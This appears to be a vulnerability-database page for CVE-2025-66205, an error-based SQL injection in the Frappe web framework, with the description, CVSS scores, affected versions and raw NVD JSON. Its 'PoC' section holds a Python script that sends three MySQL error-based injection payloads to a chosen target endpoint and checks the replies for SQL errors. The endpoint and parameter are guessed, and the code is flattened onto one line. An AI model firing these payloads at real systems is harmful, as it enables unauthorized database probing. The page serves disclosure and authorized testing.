Security Vulnerability Report
中文
CVE-2025-66205 CVSS 7.1 HIGH

CVE-2025-66205

Published: 2025-12-01 21:15:52
Last Modified: 2025-12-04 18:49:13
Source: [email protected]

Description

Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* - VULNERABLE
Frappe Framework < 15.86.0
Frappe Framework < 14.99.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66205 SQL Injection PoC for Frappe Framework # Target: Frappe versions < 15.86.0 and < 14.99.2 def exploit_sql_injection(target_url, endpoint): """ Error-based SQL injection PoC Tests for SQL injection vulnerability in Frappe endpoint """ headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Test payload - extract database version using error-based injection # This payload exploits the lack of parameter validation payloads = [ "test' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--", "test' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)--", "test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--" ] print(f"[*] Testing target: {target_url}") print(f"[*] Target endpoint: {endpoint}") for i, payload in enumerate(payloads, 1): print(f"\n[+] Testing payload {i}/3...") print(f"[*] Payload: {payload}") try: # Adjust data parameter based on actual vulnerable parameter data = { 'cmd': payload, # Common parameter in Frappe API 'doctype': 'User', 'name': 'Administrator' } response = requests.post( f"{target_url}{endpoint}", data=data, headers=headers, timeout=10, verify=False ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error signatures in response error_signatures = [ 'XPATH', 'MySQL', 'syntax', 'SQL', 'mysql', 'You have an error in your SQL', 'Warning: mysql', 'sqlite3.OperationalError', 'ProgrammingError' ] for signature in error_signatures: if signature in response.text: print(f"[!] SQL Error detected: {signature}") print(f"[!] Vulnerable to SQL Injection!") print(f"\n[+] Partial response:") print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") continue print("\n[-] No SQL injection detected with test payloads") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-66205_poc.py <target_url> <endpoint>") print("Example: python cve-2025-66205_poc.py http://vulnerable-site.com /api/method/endpoint") sys.exit(1) target = sys.argv[1].rstrip('/') endpoint = sys.argv[2] exploit_sql_injection(target, endpoint)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66205", "sourceIdentifier": "[email protected]", "published": "2025-12-01T21:15:52.443", "lastModified": "2025-12-04T18:49:12.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, a certain endpoint was vulnerable to error-based SQL injection due to lack of validation of parameters. Some information like version could be retrieved. This vulnerability is fixed in 15.86.0 and 14.99.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.99.2", "matchCriteriaId": "5F7C6678-1529-4C46-BF75-8647AF1170C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.86.0", "matchCriteriaId": "63006503-DD78-47D9-ACDE-9D3480FAE9F6"}]}]}], "references": [{"url": "https://github.com/frappe/frappe/commit/984c641bff9539b6126a01146096f133db6a955b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/frappe/security/advisories/GHSA-mp93-8vxr-hqq9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.